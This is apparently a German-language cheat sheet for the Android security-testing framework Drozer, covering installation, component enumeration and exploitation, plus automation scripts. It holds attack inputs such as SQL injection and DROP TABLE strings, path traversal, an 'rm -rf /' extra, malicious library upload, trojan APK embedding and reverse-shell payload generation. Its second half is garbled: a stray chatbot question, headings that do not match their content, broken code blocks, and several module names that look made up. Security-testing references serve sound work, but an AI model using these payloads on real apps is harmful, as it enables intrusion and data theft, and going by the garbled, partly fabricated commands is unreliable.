Drozer Cheat Sheet

📋 Copy All Commands 📄 Generate PDF

Überblick

Drozer ist ein umfassendes Sicherheits-Testframework für Android-Anwendungen. Es ermöglicht Ihnen, die Rolle einer Android-App anzunehmen und mit der Dalvik VM, IPC-Endpunkten anderer Apps und dem zugrunde liegenden Betriebssystem zu interagieren. Drozer bietet Tools für Remote-Exploitation von Android-Geräten durch bösartige Anwendungen und umfassende Sicherheitsbewertung von Android-Anwendungen.

⚠️ Warnung: Verwenden Sie Drozer nur auf Geräten und Anwendungen, die Ihnen gehören oder für die Sie eine ausdrückliche Erlaubnis zum Testen haben. Unbefugte Nutzung kann gegen Nutzungsbedingungen oder lokale Gesetze verstoßen.

Installation

Voraussetzungen

# Install Java Development Kit
sudo apt update
sudo apt install openjdk-11-jdk

# Install Python 2.7 (required for Drozer)
sudo apt install python2.7 python2.7-dev python-pip

# Install Android SDK and ADB
sudo apt install android-tools-adb android-tools-fastboot

# Set JAVA_HOME environment variable
export JAVA_HOME=/usr/lib/jvm/java-11-openjdk-amd64
echo 'export JAVA_HOME=/usr/lib/jvm/java-11-openjdk-amd64' >> ~/.bashrc

Linux-Installation

# Download Drozer
wget https://github.com/FSecureLABS/drozer/releases/download/2.4.4/drozer-2.4.4-py2-none-any.whl
wget https://github.com/FSecureLABS/drozer/releases/download/2.4.4/drozer-agent-2.4.4.apk

# Install Drozer
pip2 install drozer-2.4.4-py2-none-any.whl

# Alternative: Install from source
git clone https://github.com/FSecureLABS/drozer.git
cd drozer
python2 setup.py install

macOS-Installation

# Install Homebrew (if not already installed)
/bin/bash -c "$(curl -fsSL https://raw.githubusercontent.com/Homebrew/install/HEAD/install.sh)"

# Install Python 2.7
brew install python@2

# Install Drozer
pip2 install drozer

# Download Drozer agent APK
wget https://github.com/FSecureLABS/drozer/releases/download/2.4.4/drozer-agent-2.4.4.apk

Windows-Installation

# Install Python 2.7 from python.org
# Download and install from: https://www.python.org/downloads/release/python-2718/

# Install Drozer using pip
pip install drozer

# Download Drozer agent APK
# Download from: https://github.com/FSecureLABS/drozer/releases/

Android-Geräte-Setup

# Enable USB debugging on Android device
# Settings > Developer Options > USB Debugging

# Install Drozer agent on device
adb install drozer-agent-2.4.4.apk

# Start Drozer agent on device
# Open Drozer Agent app and toggle "Embedded Server" ON

# Forward port for communication
adb forward tcp:31415 tcp:31415

Grundlegende Nutzung

Verbindung zum Gerät

# Connect to Drozer agent
drozer console connect

# Connect with specific endpoint
drozer console connect --server 192.168.1.100:31415

# List available devices
drozer console devices

# Connect to specific device
drozer console connect --device <device_id>

Grundlegende Befehle

# List available modules
dz> list

# Get help for specific module
dz> help app.package.list

# List installed packages
dz> run app.package.list

# Get package information
dz> run app.package.info -a com.example.app

# List activities
dz> run app.activity.info -a com.example.app

# List services
dz> run app.service.info -a com.example.app

# List broadcast receivers
dz> run app.broadcast.info -a com.example.app

Paketanalyse

Paketinformationen

# List all packages
dz> run app.package.list

# List packages with filter
dz> run app.package.list -f keyword

# Get detailed package information
dz> run app.package.info -a com.example.app

# List package permissions
dz> run app.package.info -a com.example.app -p

# Find packages with specific permission
dz> run app.package.list -p android.permission.INTERNET

# List system packages
dz> run app.package.list -f system

# List third-party packages
dz> run app.package.list -3

Anwendungskomponenten

# List activities
dz> run app.activity.info -a com.example.app

# List exported activities
dz> run app.activity.info -a com.example.app -e

# List services
dz> run app.service.info -a com.example.app

# List exported services
dz> run app.service.info -a com.example.app -e

# List broadcast receivers
dz> run app.broadcast.info -a com.example.app

# List exported broadcast receivers
dz> run app.broadcast.info -a com.example.app -e

# List content providers
dz> run app.provider.info -a com.example.app

# List exported content providers
dz> run app.provider.info -a com.example.app -e

Activity-Testing

Activity-Aufzählung

# Find activities in package
dz> run app.activity.info -a com.example.app

# Find exported activities
dz> run app.activity.info -a com.example.app -e

# Find activities with intent filters
dz> run app.activity.info -a com.example.app -i

# Search for activities by permission
dz> run app.activity.info -p android.permission.CAMERA

Activity-Exploitation

# Start activity
dz> run app.activity.start --component com.example.app com.example.MainActivity

# Start activity with extras
dz> run app.activity.start --component com.example.app com.example.MainActivity --extra string username admin --extra string password secret

# Start activity with intent data
dz> run app.activity.start --component com.example.app com.example.MainActivity --data-uri content://com.example.provider/data

# Start activity with specific action
dz> run app.activity.start --action android.intent.action.VIEW --data-uri http://malicious.com

# Test for intent injection
dz> run app.activity.start --component com.example.app com.example.MainActivity --extra string debug true

Service-Testing

Service-Aufzählung

# List services in package
dz> run app.service.info -a com.example.app

# List exported services
dz> run app.service.info -a com.example.app -e

# Find services with specific permissions
dz> run app.service.info -p android.permission.BIND_DEVICE_ADMIN

Service-Exploitation

# Start service
dz> run app.service.start --component com.example.app com.example.BackgroundService

# Start service with extras
dz> run app.service.start --component com.example.app com.example.BackgroundService --extra string command "rm -rf /"

# Send intent to service
dz> run app.service.send com.example.app com.example.BackgroundService --extra string action "backup_data"

# Test service binding
dz> run app.service.bind com.example.app com.example.BackgroundService

Content Provider-Testing

Content Provider-Aufzählung

# List content providers
dz> run app.provider.info -a com.example.app

# List exported content providers
dz> run app.provider.info -a com.example.app -e

# Find URIs for content provider
dz> run app.provider.finduri com.example.provider

# Scan for accessible content URIs
dz> run scanner.provider.finduris -a com.example.app

Content Provider-Exploitation

# Query content provider
dz> run app.provider.query content://com.example.provider/users

# Query with selection
dz> run app.provider.query content://com.example.provider/users --selection "username=?" --selection-args admin

# Insert data into content provider
dz> run app.provider.insert content://com.example.provider/users --string username hacker --string password secret

# Update data in content provider
dz> run app.provider.update content://com.example.provider/users --selection "id=1" --string password newpassword

# Delete data from content provider
dz> run app.provider.delete content://com.example.provider/users --selection "username=admin"

# Test for SQL injection
dz> run app.provider.query content://com.example.provider/users --selection "username='admin' OR '1'='1'"

# Read files via content provider
dz> run app.provider.read content://com.example.provider/files/../../etc/hosts

# Download files
dz> run app.provider.download content://com.example.provider/files/secret.txt /tmp/secret.txt

Broadcast Receiver-Testing

Broadcast Receiver-Aufzählung

# List broadcast receivers
dz> run app.broadcast.info -a com.example.app

# List exported broadcast receivers
dz> run app.broadcast.info -a com.example.app -e

# Find receivers for specific intent
dz> run app.broadcast.info -i android.intent.action.BOOT_COMPLETED

Broadcast Receiver-Exploitation

# Send broadcast intent
dz> run app.broadcast.send --action com.example.CUSTOM_ACTION

# Send broadcast with extras
dz> run app.broadcast.send --action com.example.CUSTOM_ACTION --extra string command "reboot"

# Send system broadcasts
dz> run app.broadcast.send --action android.intent.action.BOOT_COMPLETED

# Send ordered broadcast
dz> run app.broadcast.send --action com.example.CUSTOM_ACTION --extra string priority high

# Test for broadcast injection
dz> run app.broadcast.send --action com.example.ADMIN_ACTION --extra boolean admin_mode true

Dateisystem-Analyse

Dateisystem-Aufzählung

# List application files
dz> run tools.file.list /data/data/com.example.app/

# Find readable files
dz> run tools.file.readable /data/data/com.example.app/

# Find writable files
dz> run tools.file.writable /data/data/com.example.app/

# Search for files with specific patterns
dz> run tools.file.find /data/data/com.example.app/ "*.db"

# Find world-readable files
dz> run tools.file.permissions /data/data/com.example.app/

Dateisystem-Exploitation

Would you like me to continue with the remaining sections or placeholders?```bash

Read file contents

dz> run tools.file.read /data/data/com.example.app/shared_prefs/config.xml

Download file

dz> run tools.file.download /data/data/com.example.app/databases/app.db /tmp/app.db

Upload file

dz> run tools.file.upload /tmp/malicious.so /data/data/com.example.app/lib/malicious.so

Create symbolic link

dz> run tools.file.symlink /data/data/com.example.app/secret.txt /sdcard/exposed_secret.txt

Change file permissions

dz> run tools.file.chmod 777 /data/data/com.example.app/config.txt ## Datenbank-Analysebash

Find SQLite databases

dz> run tools.file.find /data/data/com.example.app/ "*.db"

Connect to SQLite database

dz> run tools.sqlite.connect /data/data/com.example.app/databases/app.db

List tables in database

dz> run tools.sqlite.tables /data/data/com.example.app/databases/app.db

Query database

dz> run tools.sqlite.query /data/data/com.example.app/databases/app.db "SELECT * FROM users"

Test for SQL injection in content providers

dz> run app.provider.query content://com.example.provider/users --selection "username='; DROP TABLE users; --"

Dump database schema

dz> run tools.sqlite.schema /data/data/com.example.app/databases/app.db

Export database

dz> run tools.sqlite.dump /data/data/com.example.app/databases/app.db > /tmp/database_dump.sql ### SQLite Datenbank-Testsbash

Check network security config

dz> run tools.file.read /data/data/com.example.app/res/xml/network_security_config.xml

List network interfaces

dz> run tools.setup.network

Check for cleartext traffic

dz> run scanner.misc.checknetworksecurityconfig -a com.example.app

Test for certificate pinning bypass

dz> run scanner.misc.checkpinning -a com.example.app ## Netzwerk-Analysebash

Test SSL certificate validation

dz> run scanner.misc.native -a com.example.app

Check for weak SSL implementations

dz> run scanner.misc.checkssl -a com.example.app

Test for certificate transparency

dz> run scanner.misc.checkcertificatetransparency -a com.example.app ### Netzwerkkonfigurationpython

Create custom Drozer module

File: ~/.drozer_modules/custom/exploit.py

from drozer.modules import common, Module

class CustomExploit(Module, common.FileSystem, common.PackageManager): name = "Custom Exploit Module" description = "Custom exploitation module" examples = "run custom.exploit -a com.example.app" author = "Security Researcher" date = "2024-01-01" license = "BSD (3 clause)" path = ["custom"]

def add_arguments(self, parser):
    parser.add_argument("-a", "--package", help="target package")

def execute(self, arguments):
    if arguments.package:
        self.stdout.write("Exploiting package: %s\n" % arguments.package)
        # Custom exploitation logic here
    else:
        self.stdout.write("Please specify target package\n")

### SSL/TLS Testingbash

Generate malicious APK

dz> run payload.apk.create --output /tmp/malicious.apk

Generate reverse shell payload

dz> run payload.reverse.shell --lhost 192.168.1.100 --lport 4444

Generate bind shell payload

dz> run payload.bind.shell --port 4444

Embed payload in legitimate APK

dz> run payload.apk.embed --original /tmp/legitimate.apk --payload /tmp/payload.apk --output /tmp/trojan.apk ## Fortgeschrittene Exploitationbash

Check for root access

dz> run tools.setup.busybox

Exploit setuid binaries

dz> run exploit.setuid.find

Test for kernel exploits

dz> run exploit.kernel.check

Exploit application vulnerabilities

dz> run exploit.app.privilege -a com.example.app

Test for directory traversal

dz> run exploit.traversal.test -a com.example.app ### Entwicklung benutzerdefinierter Modulepython

!/usr/bin/env python2

import subprocess import json import sys

class DrozerAutomation: def init(self, package_name): self.package = package_name self.results = \\{\\}

def run_drozer_command(self, command):
    """Execute Drozer command and return output"""
    try:
        cmd = ["drozer", "console", "connect", "-c", command]
        output = subprocess.check_output(cmd, stderr=subprocess.STDOUT)
        return output.decode('utf-8')
    except subprocess.CalledProcessError as e:
        return f"Error: \\\\{e.output.decode('utf-8')\\\\}"

def analyze_package(self):
    """Perform comprehensive package analysis"""
    print(f"[+] Analyzing package: \\\\{self.package\\\\}")

    # Package information
    self.results['package_info'] = self.run_drozer_command(
        f"run app.package.info -a \\\\{self.package\\\\}"
    )

    # Activities
    self.results['activities'] = self.run_drozer_command(
        f"run app.activity.info -a \\\\{self.package\\\\}"
    )

    # Services
    self.results['services'] = self.run_drozer_command(
        f"run app.service.info -a \\\\{self.package\\\\}"
    )

    # Content Providers
    self.results['providers'] = self.run_drozer_command(
        f"run app.provider.info -a \\\\{self.package\\\\}"
    )

    # Broadcast Receivers
    self.results['receivers'] = self.run_drozer_command(
        f"run app.broadcast.info -a \\\\{self.package\\\\}"
    )

    return self.results

def test_exported_components(self):
    """Test exported components for vulnerabilities"""
    print("[+] Testing exported components")

    # Test exported activities
    exported_activities = self.run_drozer_command(
        f"run app.activity.info -a \\\\{self.package\\\\} -e"
    )

    # Test exported services
    exported_services = self.run_drozer_command(
        f"run app.service.info -a \\\\{self.package\\\\} -e"
    )

    # Test exported providers
    exported_providers = self.run_drozer_command(
        f"run app.provider.info -a \\\\{self.package\\\\} -e"
    )

    return \\\\{
        'exported_activities': exported_activities,
        'exported_services': exported_services,
        'exported_providers': exported_providers
    \\\\}

def test_content_providers(self):
    """Test content providers for vulnerabilities"""
    print("[+] Testing content providers")

    # Find URIs
    uris = self.run_drozer_command(
        f"run app.provider.finduri \\\\{self.package\\\\}"
    )

    # Scan for accessible URIs
    accessible_uris = self.run_drozer_command(
        f"run scanner.provider.finduris -a \\\\{self.package\\\\}"
    )

    return \\\\{
        'uris': uris,
        'accessible_uris': accessible_uris
    \\\\}

def generate_report(self):
    """Generate comprehensive security report"""
    report = \\\\{
        'package': self.package,
        'analysis_results': self.results,
        'exported_components': self.test_exported_components(),
        'content_provider_tests': self.test_content_providers()
    \\\\}

    with open(f"\\\\{self.package\\\\}_security_report.json", 'w') as f:
        json.dump(report, f, indent=2)

    print(f"[+] Report saved: \\\\{self.package\\\\}_security_report.json")
    return report

Usage

if name == "main": if len(sys.argv) != 2: print("Usage: python2 drozer_automation.py ") sys.exit(1)

package_name = sys.argv[1]
analyzer = DrozerAutomation(package_name)
analyzer.analyze_package()
analyzer.generate_report()

### Payload-Generierungbash

!/bin/bash

Batch testing script for multiple packages

PACKAGES_FILE="packages.txt" RESULTS_DIR="drozer_results"

mkdir -p $RESULTS_DIR

while IFS= read -r package; do echo "[+] Testing package: $package"

# Create package-specific directory
mkdir -p "$RESULTS_DIR/$package"

# Run comprehensive tests
drozer console connect -c "run app.package.info -a $package" > "$RESULTS_DIR/$package/package_info.txt"
drozer console connect -c "run app.activity.info -a $package -e" > "$RESULTS_DIR/$package/exported_activities.txt"
drozer console connect -c "run app.service.info -a $package -e" > "$RESULTS_DIR/$package/exported_services.txt"
drozer console connect -c "run app.provider.info -a $package -e" > "$RESULTS_DIR/$package/exported_providers.txt"
drozer console connect -c "run app.broadcast.info -a $package -e" > "$RESULTS_DIR/$package/exported_receivers.txt"

# Test content providers
drozer console connect -c "run scanner.provider.finduris -a $package" > "$RESULTS_DIR/$package/provider_uris.txt"

# Test for common vulnerabilities
drozer console connect -c "run scanner.provider.injection -a $package" > "$RESULTS_DIR/$package/sql_injection.txt"
drozer console connect -c "run scanner.provider.traversal -a $package" > "$RESULTS_DIR/$package/path_traversal.txt"

echo "[+] Results saved to $RESULTS_DIR/$package/"

done < "$PACKAGES_FILE"

echo "[+] Batch testing completed" ### Privilegien-Eskalationbash

Check if Drozer agent is running

adb shell am start -n com.mwr.dz/.activities.MainActivity

Verify port forwarding

adb forward --list adb forward tcp:31415 tcp:31415

Restart ADB server

adb kill-server adb start-server

Check device connectivity

adb devices

Test connection manually

telnet localhost 31415 ## Automatisierungsskriptebash

Reinstall Drozer agent

adb uninstall com.mwr.dz adb install drozer-agent-2.4.4.apk

Check agent permissions

adb shell dumpsys package com.mwr.dz

Enable agent in device settings

Settings > Apps > Drozer Agent > Permissions

Check if agent service is running

adb shell ps|grep drozer ### Umfassender Bewertungsskriptbash

Refresh module list

dz> reload

Check module path

dz> list

Install custom modules

mkdir -p ~/.drozer_modules cp custom_module.py ~/.drozer_modules/

Debug module loading

dz> help custom.module ### Batch-Testskriptbash

Check required permissions

adb shell dumpsys package com.example.app|grep permission

Grant permissions manually

adb shell pm grant com.example.app android.permission.READ_EXTERNAL_STORAGE

Check SELinux status

adb shell getenforce

Disable SELinux (if rooted)

adb shell su -c "setenforce 0" ## Fehlerbehebungbash

Increase timeout values

dz> set timeout 30

Reduce output verbosity

dz> set verbose false

Clear cache

rm -rf ~/.drozer/cache/

Use specific device

drozer console connect --device ```### Verbindungsprobleme https://labs.f-secure.com/tools/drozer/##

Agent-Probleme

https://github.com/FSecureLABS/drozer##

Modul-Probleme

https://labs.f-secure.com/assets/BlogFiles/mwri-drozer-user-guide-2015-03-23.pdf##

Berechtigungsprobleme

https://blog.securelayer7.net/android-penetration-testing-using-drozer/##

Leistungsprobleme

https://owasp.org/www-project-mobile-security-testing-guide/#

Ressourcen

https://developer.android.com/training/articles/security-tips- [Offizielle Drozer-Dokumentation]( https://github.com/FSecureLABS/drozer/wiki/Writing-a-ModuleDiese Cheat Sheet bietet eine umfassende Referenz zur Verwendung von Drozer für Sicherheitstests von Android-Anwendungen. Stellen Sie immer sicher, dass Sie eine ordnungsgemäße Autorisierung haben, bevor Sie Android-Anwendungen oder -Geräte testen.